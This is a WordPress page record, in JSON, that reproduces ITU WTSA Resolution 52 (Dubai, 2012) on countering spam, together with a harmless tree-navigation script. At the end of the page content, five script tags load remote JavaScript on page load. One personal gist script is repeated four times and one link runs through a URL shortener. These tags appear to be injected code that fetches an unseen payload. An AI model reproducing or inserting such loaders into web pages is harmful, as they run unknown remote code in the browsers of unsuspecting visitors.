{"id":572,"date":"2013-05-20T11:24:08","date_gmt":"2013-05-20T15:24:08","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=572"},"modified":"2015-06-30T00:31:24","modified_gmt":"2015-06-30T04:31:24","slug":"wtsa_52","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/wtsa\/wtsa-2012\/wtsa_52\/","title":{"rendered":"WTSA Resolution 52"},"content":{"rendered":"<p><style type=\"text\/css\">\r\nbody {}\r\n\r\n:link { color: #0000ff; text-decoration:none;}\r\n:visited { color: #6666ff; text-decoration:none; }\r\na:active { color: #0000ff; text-decoration:none;}\r\na:hover {color: #0000ff; text-decoration:underline; }\r\n\r\ndiv.basetext {}\r\n\r\ndiv.basetop {}\r\n\r\nh1 {\r\n    text-align:center;\r\n}\r\n\r\nspan.h2 {}\r\n\r\ndiv.year {}\r\n\r\ndiv.form {}\r\n\r\nspan.cpt {}\r\n\r\nspan.cm {}\r\n\r\n.fl {}\r\n\r\nul {}\r\n\r\nli {}\r\n\r\nul li {}\r\n\r\nli.basic {}\r\n\r\nspan.links {}\r\n\r\n\r\n\r\n\r\n.sub { display: none; }\r\n.subexp {display: block; }\r\n.sub { display: none; } \r\n\r\n.subexp {display: block; } \r\n\r\nli.exp {\r\n  cursor:pointer;\r\n}\r\n\r\nli.col {\r\n  cursor:pointer;\r\n}\r\n\r\nli.exp_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\nli.col_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\n\r\nli.basic_active {\r\n  background-color:#eeeeff;\r\n}\r\n<\/style><br \/>\n<SCRIPT language=JavaScript>\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u00e4vi\u00e4 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/SCRIPT><\/p>\n<h3><span style=\"\">WTSA RESOLUTION 52 (Rev. Dubai, 2012)<\/span><\/h3>\n<h4><span style=\"\">Countering and combating spam<\/span><\/h4>\n<p><span style=\"\">The World Telecommunication Standardization Assembly (Dubai, 2012),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\" style=\"\"><span style=\"\">recognizing<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        relevant provisions of the basic instruments of ITU;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that the Declaration of Principles of the World Summit on the Information Society (WSIS) states in \u00a7 37 that &#8220;Spam is a significant and growing problem for users, networks and the Internet as a whole. Spam and cybersecurity should be dealt with at appropriate national and international levels&#8221;;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        that the WSIS Plan of Action states in \u00a7 12 that &#8220;Confidence and security are among the main pillars of the information society&#8221;, and calls for &#8220;appropriate action on spam at national and international levels&#8221;,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">recognizing further<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        the relevant parts of Resolution 130 (Rev. Guadalajara, 2010) and Resolution 174 (Guadalajara, 2010) of the Plenipotentiary Conference;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that developing Recommendations to combat spam falls within Objective 4 of the strategic plan for the Union for 2012-2015 (Part I, \u00a7 5) set out in Resolution 71 (Rev. Guadalajara, 2010) of the Plenipotentiary Conference;<\/span><\/li>\n<li class=\"col\" style=\"\"><span style=\"\">c)        the report of the chairman of the two ITU WSIS thematic meetings on countering and combating spam, which advocated a comprehensive approach to combating spam, namely:<\/span>\n<ul class=\"subexp\">\n<li class=\"basic\" style=\"\"><span style=\"\">i)        strong legislation<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">ii)        the development of technical measures<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">iii)        the establishment of industry partnerships to accelerate the studies<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">iv)        education<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">v)        international cooperation,<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">considering<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that exchanging e-mails and other telecommunications over the Internet has become one of the main means of communication between people around the world;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that there are currently a variety of definitions for the term &#8220;spam&#8221;;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        that spam has become a widespread problem causing potential loss of revenue to Internet service providers, telecommunication operators, mobile telecommunication operators and business users;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        that countering spam by technical means burdens affected entities, including network operators and service providers, as well as users who unwillingly receive such spam, with significant investments in networks, facilities, terminal equipments and applications;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)        that spam creates problems of information and telecommunication network security, and is increasingly being used as a vehicle for phishing and spreading viruses, worms, spyware and other forms of malware, etc.;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">f)        that spamming is used for criminal, fraudulent or deceptive activities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">g)        that spam is a global problem that requires international cooperation in order to find solutions;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">h)        that addressing the issue of spam is a matter of urgency;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">i)        that many countries, in particular developing countries1, need help when it comes to countering spam;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">j)        that relevant Recommendations of the ITU Telecommunication Standardization Sector (ITU-T) and relevant information from other international bodies are available which could provide guidance for future development in this area, particularly with regard to lessons learned;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">k)        that technical measures to counter spam represent one of the approaches mentioned in recognizing further c) above,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">noting<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">the important technical work carried out to date in ITU-T Study Group 17, and in particular Recommendations ITU-T X.1231, ITU-T X.1240, ITU-T X.1241, ITU-T X.1242, ITU-T X.1243, ITU-T X.1244 and ITU-T X.1245,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">resolves to instruct the relevant study groups<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to continue to support ongoing work, in particular in Study Group 17, related to countering spam (e.g. e-mail) and to accelerate their work on spam in order to address existing and future threats within the remit and expertise of ITU-T, as appropriate;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to continue collaboration with the relevant organizations (e.g. the Internet Engineering Task Force (IETF)), in order to continue developing, as a matter of urgency, technical Recommendations with a view to exchanging best practices and disseminating information through joint workshops, training sessions, etc.,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">further instructs ITU-T Study Group 17<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">to report regularly to the Telecommunication Standardization Advisory Group on progress under this resolution,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">instructs the Director of the Telecommunication Standardization Bureau<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to provide all necessary assistance with a view to expediting such efforts;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to initiate a study &#8211; including sending a questionnaire to the ITU membership &#8211;indicating the volume, types (e.g. e-mail spam, SMS spam, spam in IP-based multimedia applications) and features (e.g. different major routes and sources) of spam traffic, in order to help Member States and relevant operating agencies identify such routes, sources and volumes and estimate the amount of investment in facilities and other technical means to counter and combat such spam, taking into account work that has already been carried out;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3        to continue to cooperate with the Secretary-General&#8217;s initiative on cybersecurity and with the Telecommunication Development Bureau in relation to any item concerning cybersecurity under Resolution 45 (Rev. Hyderabad, 2010) of the World Telecommunication Development Conference, and to ensure coordination among these different activities,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">invites Member States, Sector Members and Associates<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">to contribute to this work,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">further invites Member States<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">to take appropriate steps to ensure that appropriate and effective measures are taken within their national and legal frameworks to combat spam and its propagation.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WTSA RESOLUTION 52 (Rev. Dubai, 2012) Countering and combating spam The World Telecommunication Standardization Assembly (Dubai, 2012), recognizing a) relevant provisions of the basic instruments of ITU; b) that the Declaration of Principles of the World Summit on the Information Society (WSIS) states in \u00a7 37 that &#8220;Spam is a significant and growing problem for [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1545,"menu_order":52,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-572","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/572","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=572"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/572\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1545"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=572"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}